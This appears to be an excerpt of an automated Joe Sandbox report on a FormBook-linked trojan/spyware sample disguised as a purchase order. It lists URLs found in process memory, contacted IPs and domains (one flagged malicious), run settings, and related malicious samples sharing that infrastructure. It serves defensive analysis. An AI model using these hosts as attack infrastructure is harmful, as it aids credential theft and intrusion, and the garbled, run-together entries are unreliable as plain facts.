                                                                            		unknown
                                                                            http://www.inbulkses.shop/product-category/dish-washing-gloves/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.inbulkses.shop/wp-includes/js/underscore.min.js?ver=1.13.7RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.inbulkses.shop/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.25.10RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.inbulkses.shop/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?veRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.inbulkses.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.jRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdn.shopify.com/s/files/1/0522/1505/4491/files/8ozsleeve.png?v=1711659498RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://gemini.google.com/app?q=cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.inbulkses.shop/xmlrpc.php?rsdRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.minRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/css/style-loop-product-modern-5.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/?page_id=3RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/plugins/nasa-core/assets/css/nasa-sc-woo.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.inbulkses.shop/product-category/foil-pans-lids/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icocttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://static.loopia.se/shared/logo/logo-loopia-white.svgRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/css/style-off-canvas.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/images/404.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.inbulkses.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.inbulkses.shop/product-category/eco-sugarcane-products/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.inbulkses.shop/product-category/bakery-boxes/cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://rankmath.com/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.inbulkses.shop/wp-includes/js/wp-util.min.js?ver=6.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.inbulkses.shop/wp-content/uploads/2017/11/payment-icons.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.inbulkses.shop/product-category/plastic-utensils/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/css/style-mobile-menu.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.inbulkses.shop/wp-login.php?action=logout&amp;redirect_to=http%3A%2F%2Fwww.inbulkses.shopRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://static.loopia.se/shared/style/2022-extra-pages.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.inbulkses.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://site.ip138.com/www.jyshe18.buzzRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://static.loopia.se/responsive/images/iOS-114.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drfalse
                                                                                      		high
                                                                                      http://www.inbulkses.shop/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-admin/admin-ajax.phpRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3715.css?ver=1733888756RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.25.10RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/#websitecttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://static.loopia.se/responsive/styles/reset.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/yith-woocommerce-compare/assets/js/woocompare.min.js?veRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/nasa-core/assets/js/min/nasa.script.min.jsRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://static.loopia.se/responsive/images/iOS-57.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://g.live.com/odclientsettings/Prod/C:qmgr.db.5.drfalse
                                                                                        		high
                                                                                        http://www.inbulkses.shop/product-category/paper-food-tray/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.inbulkses.shop/product-category/our-new-arrival/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.inbulkses.shop/wp-content/plugins/nasa-core/assets/js/min/nasa.functions.min.jsRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.inbulkses.shop/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.25.10RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3701.css?ver=1733888755RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        194.9.94.86
                                                                                        		www.milp.storeSweden
                                                                                        		39570LOOPIASEfalse
                                                                                        76.223.54.146
                                                                                        		www.bonheur.techUnited States
                                                                                        		16509AMAZON-02USfalse
                                                                                        104.21.83.167
                                                                                        		www.inbulkses.shopUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        199.59.243.227
                                                                                        		94950.bodis.comUnited States
                                                                                        		395082BODIS-NJUSfalse
                                                                                        172.67.131.144
                                                                                        		www.jyshe18.buzzUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        85.159.66.93
                                                                                        		natroredirect.natrocdn.comTurkey
                                                                                        		34619CIZGITRfalse
                                                                                        15.197.148.33
                                                                                        		outandaboutatlanta.netUnited States
                                                                                        		7430TANDEMUSfalse
                                                                                        103.106.67.112
                                                                                        		www.furrcali.xyzNew Zealand
                                                                                        		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                        209.74.79.40
                                                                                        		www.unlimitu.websiteUnited States
                                                                                        		31744MULTIBAND-NEWHOPEUSfalse
                                                                                        52.223.13.41
                                                                                        		www.guilda.proUnited States
                                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                                        142.171.82.112
                                                                                        		www.augier2619.topCanada
                                                                                        		7122MTS-ASNCAfalse
                                                                                        198.2.236.225
                                                                                        		www.shandongyb.topUnited States
                                                                                        		54600PEGTECHINCUSfalse

                                                                                        Private

                                                                                        IP
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1574077
                                                                                        Start date and time:2024-12-12 21:50:01 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 17m 36s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                        Run name:Suspected Instruction Hammering
                                                                                        Number of analysed new started processes analysed:14
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Sample name:PO 1202495088.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@11/9@18/13
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 86
                                                                                        • Number of non-executed functions: 281
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SgrmBroker.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 23.44.104.130
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: PO 1202495088.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        15:54:13API Interceptor28814013x Sleep call for process: cttune.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        194.9.94.86Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.deeplungatlas.org/57zf/
                                                                                        Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.torentreprenad.com/r45o/
                                                                                        P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.torentreprenad.com/r45o/
                                                                                        BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                                                                        • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.torentreprenad.com/r45o/
                                                                                        Doc PI.docGet hashmaliciousFormBookBrowse
                                                                                        • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
                                                                                        • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                        • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                        • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
                                                                                        76.223.54.146Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.catholic.today/ehe0/
                                                                                        AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.lunch.delivery/qwed/
                                                                                        firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                        • 76.223.54.146/
                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.magicface.shop/gir9/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        94950.bodis.comACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        natroredirect.natrocdn.comRFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93
                                                                                        PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                        • 85.159.66.93

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 104.21.34.183
                                                                                        RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.95.160
                                                                                        SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.34.183
                                                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 172.67.177.134
                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.34.183
                                                                                        WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 162.159.129.233
                                                                                        ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                        • 172.67.216.167
                                                                                        htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.206.64
                                                                                        0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.185.252
                                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.112.1
                                                                                        LOOPIASEHire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.86
                                                                                        Order.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 194.9.94.86
                                                                                        Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
